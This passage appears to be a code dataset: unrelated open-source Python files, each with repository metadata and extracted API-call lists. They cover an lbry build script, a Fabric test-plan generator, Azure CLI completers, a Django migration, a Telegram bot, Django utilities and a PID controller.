rep.url)\n', (42917, 42971), False, 'import pytest\n'), ((43924, 43978), 'pytest.raises', 'pytest.raises', (['Exception', 'upload.upload_part', '"""Part 3"""'], {}), "(Exception, upload.upload_part, 'Part 3')\n", (43937, 43978), False, 'import pytest\n'), ((45205, 45298), 'functools.partial', 'functools.partial', (['S3Uploader'], {'host': 'S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST'}), '(S3Uploader, host=S3UploaderIntegrationTest.\n SIMPLIFIED_TEST_MINIO_HOST)\n', (45222, 45298), False, 'import functools\n'), ((45580, 45673), 'functools.partial', 'functools.partial', (['S3Uploader'], {'host': 'S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST'}), '(S3Uploader, host=S3UploaderIntegrationTest.\n SIMPLIFIED_TEST_MINIO_HOST)\n', (45597, 45673), False, 'import functools\n')]
vanshdevgan/lbry-sdk
lbry/scripts/set_build.py
3624a3b450945235edcf76971e18c898fba67455
"""Set the build version to be 'qa', 'rc', 'release'""" import sys import os import re import logging log = logging.getLogger() log.addHandler(logging.StreamHandler()) log.setLevel(logging.DEBUG) def get_build_type(travis_tag=None): if not travis_tag: return "qa" log.debug("getting build type for tag: \"%s\"", travis_tag) if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag): return 'rc' elif re.match(r'v\d+\.\d+\.\d+$', travis_tag): return 'release' return 'qa' def main(): root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py') log.debug("configuring build type file: %s", build_type_path) travis_commit = os.environ['TRAVIS_COMMIT'][:6] build_type = get_build_type(os.environ.get('TRAVIS_TAG', None)) log.debug("setting build type=%s, build commit=%s", build_type, travis_commit) with open(build_type_path, 'w') as f: f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n") if __name__ == '__main__': sys.exit(main())
[((110, 129), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (127, 129), False, 'import logging\n'), ((145, 168), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (166, 168), False, 'import logging\n'), ((351, 401), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$', travis_tag)\n", (359, 401), False, 'import re\n'), ((622, 669), 'os.path.join', 'os.path.join', (['root_dir', '"""lbry"""', '"""build_type.py"""'], {}), "(root_dir, 'lbry', 'build_type.py')\n", (634, 669), False, 'import os\n'), ((427, 471), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$', travis_tag)\n", (435, 471), False, 'import re\n'), ((820, 854), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_TAG"""', 'None'], {}), "('TRAVIS_TAG', None)\n", (834, 854), False, 'import os\n'), ((571, 597), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (587, 597), False, 'import os\n')]
gbl1124/hfrd
backend/jenkins/pipelines/ansible/utils/testplan_gen.py
327d7c1e18704d2e31a2649b40ae1d90353ebe24
#!/usr/bin/python import yaml import os import ast import sys from collections import OrderedDict curr_dir = os.getcwd() work_dir = sys.argv[1] network_type = sys.argv[2] testplan_dict = {} testplan_dict["name"] = "System performance test" testplan_dict["description"] = "This test is to create as much chaincode computation load as possible" testplan_dict["runid"] = "RUNID_HERE" if network_type == "ibp": testplan_dict["networkid"] = sys.argv[3] testplan_dict["collectFabricMetrics"] = False testplan_dict["storageclass"] = "default" testplan_dict["saveLog"] = False testplan_dict["continueAfterFail"] = True testplan_dict["tests"] = [] testplan_dict["peernodeAlias"] =[] if os.path.exists(work_dir) != True: print 'certs keyfiles directory do not exist' exit(1) # Load template file with open(curr_dir + "/templates/testplan_template.yml", 'r') as stream: template = yaml.load(stream) channel_create = template["CHANNEL_CREATE"] # channel_join = template["CHANNEL_JOIN"] chaincode_install = template["CHAINCODE_INSTALL"] chaincode_instantiate = template["CHAINCODE_INSTANTIATE"] chaincode_invoke = template["CHAINCODE_INVOKE"] execute_command = template["EXECUTE_COMMAND"] connectionProfile = {} org_list = [] org_list_lowercase = [] orderer_list = [] peer_list = [] org_peers_dict = {} org_anchor_dict ={} allAnchor_list =[] # Load connection profile for orgName in os.listdir(work_dir + '/keyfiles'): if os.path.isfile(work_dir + '/keyfiles/' + orgName + '/connection.yml'): with open(work_dir + '/keyfiles/' + orgName + '/connection.yml', 'r') as stream: connectionProfile = yaml.load(stream) if connectionProfile["orderers"] is None: continue orderer_list = orderer_list + connectionProfile["orderers"].keys() if (connectionProfile["organizations"][orgName.lower()]["peers"] != None): org_list.append(orgName) org_list_lowercase.append(orgName.lower()) org_peers_dict[orgName] = connectionProfile["organizations"][orgName.lower( )]["peers"] peer_list = peer_list + \ connectionProfile["organizations"][orgName.lower( )]["peers"] org_anchor_dict[orgName] = sorted( connectionProfile["organizations"][orgName.lower( )]["peers"])[0] # When there is only peer or orderer, we skip tests. if len(orderer_list) == 0 or len(peer_list) == 0: outputfile =open(work_dir + '/testplan_example.yml','w') outputfile.write("") outputfile.close() exit(0) orderer_list = list(OrderedDict.fromkeys(orderer_list)) peer_list = list(OrderedDict.fromkeys(peer_list)) for orgName in org_list : tempOrgAnchorObj={} tempOrgAnchorObj[orgName+"Anchor"] = org_anchor_dict[orgName] testplan_dict["peernodeAlias"].append(tempOrgAnchorObj) tempOrgPeersObj={} tempOrgPeersObj[orgName+"Peers"] = ','.join(org_peers_dict[orgName]) testplan_dict["peernodeAlias"].append(tempOrgPeersObj) allAnchor_list.append(org_anchor_dict[orgName]) testplan_dict["peernodeAlias"].append({"allAnchors":','.join(allAnchor_list)}) testplan_dict["peernodeAlias"].append({"allPeers":','.join(peer_list)}) print 'org list: ' print org_list_lowercase print 'orderer_list: ' print orderer_list print 'peer_list: ' print peer_list print 'allAnchor_list' print allAnchor_list # CREATE_CHANNEL channel_create["parameters"]["connectionProfile"] = org_list[0] if network_type == 'cello': channel_create["parameters"]["channelConsortium"] = 'FabricConsortium' else: channel_create["parameters"]["channelConsortium"] = 'SampleConsortium' channel_create["parameters"]["channelOrgs"] = ','.join(org_list_lowercase) channel_create["parameters"]["ordererName"] = orderer_list[0] testplan_dict["tests"].append(channel_create) # JOIN_CHANNEL and INSTALL_CHAINCODE join_list = [] install_list = [] for org in org_list: channel_join = template["CHANNEL_JOIN"] channel_join["parameters"]["connectionProfile"] = org channel_join["parameters"]["peers"] = ','.join(org_peers_dict[org]) channel_join["parameters"]["ordererName"] = orderer_list[0] join_list.append(str(channel_join)) # CHAINCODE_INSTALL chaincode_install["parameters"]["connectionProfile"] = org chaincode_install["parameters"]["peers"] = ','.join(org_peers_dict[org]) install_list.append(str(chaincode_install)) for join_org in join_list: join_item = ast.literal_eval(join_org) testplan_dict["tests"].append(join_item) for install_org in install_list: install_item = ast.literal_eval(install_org) testplan_dict["tests"].append(install_item) # CHAINCODE_INSTANTIATE chaincode_instantiate["parameters"]["connectionProfile"] = org_list[0] chaincode_instantiate["parameters"]["peers"] = ','.join(peer_list) # CHAINCODE_INVOKE # Invoke with fixed transaction count : 100 chaincode_invoke["iterationCount"] = '100' chaincode_invoke["parameters"]["connectionProfile"] = org_list[0] chaincode_invoke["parameters"]["peers"] = ','.join(peer_list) chaincoode_invoke_count = str(chaincode_invoke) # Invoke with fixed running duration : 0 hour 10 minutes 0 second. # And enable running tests parallel by setting waitUntilFinish to true chaincode_invoke["iterationCount"] = '0h10m0s' chaincode_invoke["waitUntilFinish"] = False chaincoode_invoke_time = str(chaincode_invoke) # Invoke with fixed running duration : 0 hour 10 minutes 0 second chaincode_invoke["iterationCount"] = '0h10m0s' chaincode_invoke["parameters"]["peers"] = peer_list[0] chaincoode_invoke_parallel = str(chaincode_invoke) testplan_dict["tests"].append(chaincode_instantiate) testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_count)) testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_time)) testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_parallel)) # Execute command with default images testplan_dict["tests"].append(ast.literal_eval(str(execute_command))) # Execute command with customized image execute_command["name"] = "execute-command-with-customized-image" execute_command["container"] = "user/ownimage" testplan_dict["tests"].append(ast.literal_eval(str(execute_command))) connYamlStr= yaml.dump(testplan_dict,default_flow_style=False) tempstr= connYamlStr for orgName in org_list : tempstr = tempstr.replace(orgName+"Anchor:",orgName+"Anchor: &"+orgName+"Anchor") tempstr = tempstr.replace(orgName+"Peers:",orgName+"Peers: &"+orgName+"Peers") tempstr = tempstr.replace("allAnchors:","allAnchors: &allAnchors") tempstr = tempstr.replace("allPeers:","allPeers: &allPeers") tempstr = tempstr.replace("runid:","runid: &runid") if network_type == "ibp": tempstr = tempstr.replace("networkid:","networkid: &networkid") # Dump testplan file outputfile =open(work_dir + '/testplan_example.yml','w') outputfile.write(tempstr) outputfile.close()
[]
cyber-fighters/dblib
dblib/test_lib.py
9743122a55bc265f7551dd9283f381678b2703e4
"""Collection of tests.""" import pytest import dblib.lib f0 = dblib.lib.Finding('CD spook', 'my_PC', 'The CD drive is missing.') f1 = dblib.lib.Finding('Unplugged', 'my_PC', 'The power cord is unplugged.') f2 = dblib.lib.Finding('Monitor switched off', 'my_PC', 'The monitor is switched off.') def test_add_remove(): """Test function.""" db = dblib.lib.BackyardDB() # regular cases db.add(f0) assert f0 in db.findings assert len(db.findings) == 1 db.add(f1) assert f1 in db.findings assert len(db.findings) == 2 db.add(f2) assert f2 in db.findings assert len(db.findings) == 3 db.add(None) assert len(db.findings) == 3 db.remove(f1) assert f1 not in db.findings assert len(db.findings) == 2 # test exceptions with pytest.raises(TypeError): db.add(1) def test_update(): """Test function.""" db = dblib.lib.BackyardDB() db.add(f0) db.add(f1) db.update(f1, f2) assert f2 in db.findings assert len(db.findings) == 2
[((797, 821), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (810, 821), False, 'import pytest\n')]
YuanyuanNi/azure-cli
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
63844964374858bfacd209bfe1b69eb456bd64ca
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from azure.cli.core.decorators import Completer from azure.cli.core.commands.client_factory import get_subscription_id from ._client_factory import cf_policy_insights @Completer def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument client = cf_policy_insights(cmd.cli_ctx) sub = get_subscription_id(cmd.cli_ctx) rg = getattr(namespace, 'resource_group_name', None) management_group = getattr(namespace, 'management_group_name', None) if rg: result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg) elif management_group: result = client.remediations.list_for_management_group(management_group_id=management_group) else: result = client.remediations.list_for_subscription(subscription_id=sub) return [i.name for i in result] @Completer def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument client = cf_policy_insights(cmd.cli_ctx).policy_metadata from azure.mgmt.policyinsights.models import QueryOptions query_options = QueryOptions(top=2000) return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
[((695, 727), 'azure.cli.core.commands.client_factory.get_subscription_id', 'get_subscription_id', (['cmd.cli_ctx'], {}), '(cmd.cli_ctx)\n', (714, 727), False, 'from azure.cli.core.commands.client_factory import get_subscription_id\n'), ((1497, 1519), 'azure.mgmt.policyinsights.models.QueryOptions', 'QueryOptions', ([], {'top': '(2000)'}), '(top=2000)\n', (1509, 1519), False, 'from azure.mgmt.policyinsights.models import QueryOptions\n')]
CodeBrew-LTD/django-hordak
hordak/migrations/0011_auto_20170225_2222.py
efdfe503bf38b0a283790c5b4d27bd6bb28155e4
# -*- coding: utf-8 -*- # Generated by Django 1.10.4 on 2017-02-25 22:22 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import django_smalluuid.models class Migration(migrations.Migration): dependencies = [("hordak", "0010_auto_20161216_1202")] operations = [ migrations.CreateModel( name="TransactionImport", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID" ), ), ( "uuid", django_smalluuid.models.SmallUUIDField( default=django_smalluuid.models.UUIDDefault(), editable=False, unique=True ), ), ( "timestamp", models.DateTimeField(default=django.utils.timezone.now, editable=False), ), ( "has_headings", models.BooleanField( default=True, verbose_name="First line of file contains headings" ), ), ( "file", models.FileField( upload_to="transaction_imports", verbose_name="CSV file to import" ), ), ( "state", models.CharField( choices=[ ("pending", "Pending"), ("uploaded", "Uploaded, ready to import"), ("done", "Import complete"), ], default="pending", max_length=20, ), ), ( "date_format", models.CharField( choices=[ ("%d-%m-%Y", "dd-mm-yyyy"), ("%d/%m/%Y", "dd/mm/yyyy"), ("%d.%m.%Y", "dd.mm.yyyy"), ("%d-%Y-%m", "dd-yyyy-mm"), ("%d/%Y/%m", "dd/yyyy/mm"), ("%d.%Y.%m", "dd.yyyy.mm"), ("%m-%d-%Y", "mm-dd-yyyy"), ("%m/%d/%Y", "mm/dd/yyyy"), ("%m.%d.%Y", "mm.dd.yyyy"), ("%m-%Y-%d", "mm-yyyy-dd"), ("%m/%Y/%d", "mm/yyyy/dd"), ("%m.%Y.%d", "mm.yyyy.dd"), ("%Y-%d-%m", "yyyy-dd-mm"), ("%Y/%d/%m", "yyyy/dd/mm"), ("%Y.%d.%m", "yyyy.dd.mm"), ("%Y-%m-%d", "yyyy-mm-dd"), ("%Y/%m/%d", "yyyy/mm/dd"), ("%Y.%m.%d", "yyyy.mm.dd"), ("%d-%m-%y", "dd-mm-yy"), ("%d/%m/%y", "dd/mm/yy"), ("%d.%m.%y", "dd.mm.yy"), ("%d-%y-%m", "dd-yy-mm"), ("%d/%y/%m", "dd/yy/mm"), ("%d.%y.%m", "dd.yy.mm"), ("%m-%d-%y", "mm-dd-yy"), ("%m/%d/%y", "mm/dd/yy"), ("%m.%d.%y", "mm.dd.yy"), ("%m-%y-%d", "mm-yy-dd"), ("%m/%y/%d", "mm/yy/dd"), ("%m.%y.%d", "mm.yy.dd"), ("%y-%d-%m", "yy-dd-mm"), ("%y/%d/%m", "yy/dd/mm"), ("%y.%d.%m", "yy.dd.mm"), ("%y-%m-%d", "yy-mm-dd"), ("%y/%m/%d", "yy/mm/dd"), ("%y.%m.%d", "yy.mm.dd"), ], default="%d-%m-%Y", max_length=50, ), ), ( "hordak_import", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="hordak.StatementImport" ), ), ], ), migrations.CreateModel( name="TransactionImportColumn", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID" ), ), ("column_number", models.PositiveSmallIntegerField()), ( "column_heading", models.CharField(blank=True, default="", max_length=100, verbose_name="Column"), ), ( "to_field", models.CharField( blank=True, choices=[ (None, "-- Do not import --"), ("date", "Date"), ("amount", "Amount"), ("amount_out", "Amount (money in only)"), ("amount_in", "Amount (money out only)"), ("description", "Description / Notes"), ], default=None, max_length=20, null=True, verbose_name="Is", ), ), ("example", models.CharField(blank=True, default="", max_length=200)), ( "transaction_import", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="columns", to="hordak.TransactionImport", ), ), ], options={"ordering": ["transaction_import", "column_number"]}, ), migrations.AlterUniqueTogether( name="transactionimportcolumn", unique_together=set( [("transaction_import", "column_number"), ("transaction_import", "to_field")] ), ), ]
[((524, 617), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (540, 617), False, 'from django.db import migrations, models\n'), ((998, 1069), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now', 'editable': '(False)'}), '(default=django.utils.timezone.now, editable=False)\n', (1018, 1069), False, 'from django.db import migrations, models\n'), ((1164, 1255), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""First line of file contains headings"""'}), "(default=True, verbose_name=\n 'First line of file contains headings')\n", (1183, 1255), False, 'from django.db import migrations, models\n'), ((1383, 1472), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': '"""transaction_imports"""', 'verbose_name': '"""CSV file to import"""'}), "(upload_to='transaction_imports', verbose_name=\n 'CSV file to import')\n", (1399, 1472), False, 'from django.db import migrations, models\n'), ((1601, 1766), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('pending', 'Pending'), ('uploaded', 'Uploaded, ready to import'), ('done',\n 'Import complete')]", 'default': '"""pending"""', 'max_length': '(20)'}), "(choices=[('pending', 'Pending'), ('uploaded',\n 'Uploaded, ready to import'), ('done', 'Import complete')], default=\n 'pending', max_length=20)\n", (1617, 1766), False, 'from django.db import migrations, models\n'), ((2057, 3154), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('%d-%m-%Y', 'dd-mm-yyyy'), ('%d/%m/%Y', 'dd/mm/yyyy'), ('%d.%m.%Y',\n 'dd.mm.yyyy'), ('%d-%Y-%m', 'dd-yyyy-mm'), ('%d/%Y/%m', 'dd/yyyy/mm'),\n ('%d.%Y.%m', 'dd.yyyy.mm'), ('%m-%d-%Y', 'mm-dd-yyyy'), ('%m/%d/%Y',\n 'mm/dd/yyyy'), ('%m.%d.%Y', 'mm.dd.yyyy'), ('%m-%Y-%d', 'mm-yyyy-dd'),\n ('%m/%Y/%d', 'mm/yyyy/dd'), ('%m.%Y.%d', 'mm.yyyy.dd'), ('%Y-%d-%m',\n 'yyyy-dd-mm'), ('%Y/%d/%m', 'yyyy/dd/mm'), ('%Y.%d.%m', 'yyyy.dd.mm'),\n ('%Y-%m-%d', 'yyyy-mm-dd'), ('%Y/%m/%d', 'yyyy/mm/dd'), ('%Y.%m.%d',\n 'yyyy.mm.dd'), ('%d-%m-%y', 'dd-mm-yy'), ('%d/%m/%y', 'dd/mm/yy'), (\n '%d.%m.%y', 'dd.mm.yy'), ('%d-%y-%m', 'dd-yy-mm'), ('%d/%y/%m',\n 'dd/yy/mm'), ('%d.%y.%m', 'dd.yy.mm'), ('%m-%d-%y', 'mm-dd-yy'), (\n '%m/%d/%y', 'mm/dd/yy'), ('%m.%d.%y', 'mm.dd.yy'), ('%m-%y-%d',\n 'mm-yy-dd'), ('%m/%y/%d', 'mm/yy/dd'), ('%m.%y.%d', 'mm.yy.dd'), (\n '%y-%d-%m', 'yy-dd-mm'), ('%y/%d/%m', 'yy/dd/mm'), ('%y.%d.%m',\n 'yy.dd.mm'), ('%y-%m-%d', 'yy-mm-dd'), ('%y/%m/%d', 'yy/mm/dd'), (\n '%y.%m.%d', 'yy.mm.dd')]", 'default': '"""%d-%m-%Y"""', 'max_length': '(50)'}), "(choices=[('%d-%m-%Y', 'dd-mm-yyyy'), ('%d/%m/%Y',\n 'dd/mm/yyyy'), ('%d.%m.%Y', 'dd.mm.yyyy'), ('%d-%Y-%m', 'dd-yyyy-mm'),\n ('%d/%Y/%m', 'dd/yyyy/mm'), ('%d.%Y.%m', 'dd.yyyy.mm'), ('%m-%d-%Y',\n 'mm-dd-yyyy'), ('%m/%d/%Y', 'mm/dd/yyyy'), ('%m.%d.%Y', 'mm.dd.yyyy'),\n ('%m-%Y-%d', 'mm-yyyy-dd'), ('%m/%Y/%d', 'mm/yyyy/dd'), ('%m.%Y.%d',\n 'mm.yyyy.dd'), ('%Y-%d-%m', 'yyyy-dd-mm'), ('%Y/%d/%m', 'yyyy/dd/mm'),\n ('%Y.%d.%m', 'yyyy.dd.mm'), ('%Y-%m-%d', 'yyyy-mm-dd'), ('%Y/%m/%d',\n 'yyyy/mm/dd'), ('%Y.%m.%d', 'yyyy.mm.dd'), ('%d-%m-%y', 'dd-mm-yy'), (\n '%d/%m/%y', 'dd/mm/yy'), ('%d.%m.%y', 'dd.mm.yy'), ('%d-%y-%m',\n 'dd-yy-mm'), ('%d/%y/%m', 'dd/yy/mm'), ('%d.%y.%m', 'dd.yy.mm'), (\n '%m-%d-%y', 'mm-dd-yy'), ('%m/%d/%y', 'mm/dd/yy'), ('%m.%d.%y',\n 'mm.dd.yy'), ('%m-%y-%d', 'mm-yy-dd'), ('%m/%y/%d', 'mm/yy/dd'), (\n '%m.%y.%d', 'mm.yy.dd'), ('%y-%d-%m', 'yy-dd-mm'), ('%y/%d/%m',\n 'yy/dd/mm'), ('%y.%d.%m', 'yy.dd.mm'), ('%y-%m-%d', 'yy-mm-dd'), (\n '%y/%m/%d', 'yy/mm/dd'), ('%y.%m.%d', 'yy.mm.dd')], default='%d-%m-%Y',\n max_length=50)\n", (2073, 3154), False, 'from django.db import migrations, models\n'), ((4316, 4412), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""hordak.StatementImport"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'hordak.StatementImport')\n", (4333, 4412), False, 'from django.db import migrations, models\n'), ((4661, 4754), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (4677, 4754), False, 'from django.db import migrations, models\n'), ((4851, 4885), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {}), '()\n', (4883, 4885), False, 'from django.db import migrations, models\n'), ((4964, 5043), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(100)', 'verbose_name': '"""Column"""'}), "(blank=True, default='', max_length=100, verbose_name='Column')\n", (4980, 5043), False, 'from django.db import migrations, models\n'), ((5134, 5444), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'choices': "[(None, '-- Do not import --'), ('date', 'Date'), ('amount', 'Amount'), (\n 'amount_out', 'Amount (money in only)'), ('amount_in',\n 'Amount (money out only)'), ('description', 'Description / Notes')]", 'default': 'None', 'max_length': '(20)', 'null': '(True)', 'verbose_name': '"""Is"""'}), "(blank=True, choices=[(None, '-- Do not import --'), (\n 'date', 'Date'), ('amount', 'Amount'), ('amount_out',\n 'Amount (money in only)'), ('amount_in', 'Amount (money out only)'), (\n 'description', 'Description / Notes')], default=None, max_length=20,\n null=True, verbose_name='Is')\n", (5150, 5444), False, 'from django.db import migrations, models\n'), ((5837, 5893), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(200)'}), "(blank=True, default='', max_length=200)\n", (5853, 5893), False, 'from django.db import migrations, models\n'), ((5976, 6098), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""columns"""', 'to': '"""hordak.TransactionImport"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='columns', to='hordak.TransactionImport')\n", (5993, 6098), False, 'from django.db import migrations, models\n')]
devilnotcry77/devil_not_cry
Bot Telegram.py
a9d342d053c788ec6db2d1c5967ed55104b40045
from aiogram import Bot, types from aiogram.dispatcher import Dispatcher from aiogram.utils import executor TOKEN = "Token for you bot" bot = Bot(token=TOKEN) dp = Dispatcher(bot) @dp.message_handler(command=['start', 'help']) async def send_welcome(msg: types.Message): await msg.reply_to_message(f'Добро пожаловать,{msg.from_user.first_name}') @dp.message_handler(content_types=['text']) async def get_text_messages(msg: types.Message): if msg.text.lower() == 'привет': await msg.answer('Привет!') else: await msg.answer('Я не понимаю') if __name__ == '__main__': executor.start_polling(dp)
[((146, 162), 'aiogram.Bot', 'Bot', ([], {'token': 'TOKEN'}), '(token=TOKEN)\n', (149, 162), False, 'from aiogram import Bot, types\n'), ((169, 184), 'aiogram.dispatcher.Dispatcher', 'Dispatcher', (['bot'], {}), '(bot)\n', (179, 184), False, 'from aiogram.dispatcher import Dispatcher\n'), ((620, 646), 'aiogram.utils.executor.start_polling', 'executor.start_polling', (['dp'], {}), '(dp)\n', (642, 646), False, 'from aiogram.utils import executor\n')]
danlgz/django-wysiwyg-redactor
redactor/utils.py
755927ea2cb9db203c4a002b4da7ebfbf989dd64
from django.core.exceptions import ImproperlyConfigured from importlib import import_module try: from django.utils.encoding import force_text except ImportError: from django.utils.encoding import force_unicode as force_text from django.utils.functional import Promise import json def import_class(path): path_bits = path.split('.') if len(path_bits) < 2: message = "'{0}' is not a complete Python path.".format(path) raise ImproperlyConfigured(message) class_name = path_bits.pop() module_path = '.'.join(path_bits) module_itself = import_module(module_path) if not hasattr(module_itself, class_name): message = "The Python module '{0}' has no '{1}' class.".format( module_path, class_name ) raise ImportError(message) return getattr(module_itself, class_name) def is_module_image_installed(): try: from PIL import Image from PIL import ImageFile except ImportError: try: import Image import ImageFile except ImportError: return False return True class LazyEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, Promise): return force_text(obj) return super(LazyEncoder, self).default(obj) def json_dumps(data): return json.dumps(data, cls=LazyEncoder)
[((582, 608), 'importlib.import_module', 'import_module', (['module_path'], {}), '(module_path)\n', (595, 608), False, 'from importlib import import_module\n'), ((1364, 1397), 'json.dumps', 'json.dumps', (['data'], {'cls': 'LazyEncoder'}), '(data, cls=LazyEncoder)\n', (1374, 1397), False, 'import json\n'), ((460, 489), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (['message'], {}), '(message)\n', (480, 489), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1260, 1275), 'django.utils.encoding.force_unicode', 'force_text', (['obj'], {}), '(obj)\n', (1270, 1275), True, 'from django.utils.encoding import force_unicode as force_text\n')]
DrGFreeman/PyTools
timedpid.py
795e06b5a07f49a990df3c545d2d103b16dd8b4d
# timedpid.py # Source: https://github.com/DrGFreeman/PyTools # # MIT License # # Copyright (c) 2017 Julien de la Bruere-Terreault <[email protected]> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # This module defines a simple Proportional - Integral - Derivative (PID) # controller with different time step calculation methods. This is a python # implementation of my Arduino TimedPID library which can be found at # https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed # documentation. import time class TimedPID: # Constructor def __init__(self, kp = 1., ki = 0., kd = 0.): self._kp = kp self._ki = ki self._kd = kd self._cmdMin = None self._cmdMax = None self._boundRange = False self._errorIntegral = 0. self._errorPrevious = 0. self._lastCmdTime = time.time() def getCmd(self, setPoint, procVar): """Gets the PID command without time step. setPoint is the desired process set point, procVar is the current value of the process variable to be controlled. No time step is used (assumed = 1).""" # Calculate error terms error = setPoint - procVar self._errorIntegral += error errorDerivative = error - self._errorPrevious # Set last error to current error self._errorPrevious = error # Calculate command cmd = self._kp * error + self._ki * self._errorIntegral + \ self._kd * errorDerivative # Return bound command return self._boundCmd(cmd) def getCmdAutoStep(self, setPoint, procVar): """Gets the PID command with automatic time step calculation. setPoint is the desired process set point, procVar is the current value of the process variable to be controlled, The time step is calculated as the time since the last call to the method.""" # Calculate time step currentTime = time.time() timeStep = currentTime - self._lastCmdTime # Set last time method was called to current time self._lastCmdTime = currentTime # Get command return self.getCmdStep(setPoint, procVar, timeStep) def getCmdStep(self, setPoint, procVar, timeStep): """Gets the PID command with a specified time step. setPoint is the desired process set point, procVar is the current value of the process variable to be controlled, timeStep is the time step.""" # Calculate error terms error = setPoint - procVar self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep errorDerivative = (error - self._errorPrevious) / timeStep # Set last error to current error self._errorPrevious = error # Calculate command cmd = self._kp * error + self._ki * self._errorIntegral + \ self._kd * errorDerivative # Return bound command return self._boundCmd(cmd) def setCmdRange(self, cmdMin, cmdMax): """Sets the maximum command range. Commands calculated outside the cmdMin and cmdMax will be set to cmdMin or cmdMax respectively.""" self._cmdMin = cmdMin self._cmdMax = cmdMax self._boundRange = True def setGains(self, kp = 1., ki = 0., kd = 0.): """Sets the proportional, integral and derivative terms.""" self._kp = kp self._ki = ki self._kd = kd def reset(self): """Resets the PID error terms and timer.""" self._errorIntegral = 0. self._errorPrevious = 0. self._lastCmdTime = time.time() # Private methods def _boundCmd(self, cmd): """Bounds the command within the range _cmdMin to _cmdMax.""" if self._boundRange: if cmd < self._cmdMin: cmd = self._cmdMin elif cmd > self._cmdMax: cmd = self._cmdMax return cmd
[((1876, 1887), 'time.time', 'time.time', ([], {}), '()\n', (1885, 1887), False, 'import time\n'), ((2996, 3007), 'time.time', 'time.time', ([], {}), '()\n', (3005, 3007), False, 'import time\n'), ((4658, 4669), 'time.time', 'time.time', ([], {}), '()\n', (4667, 4669), False, 'import time\n')]
bernd-clemenz/pmon
pmon/zmq_responder.py
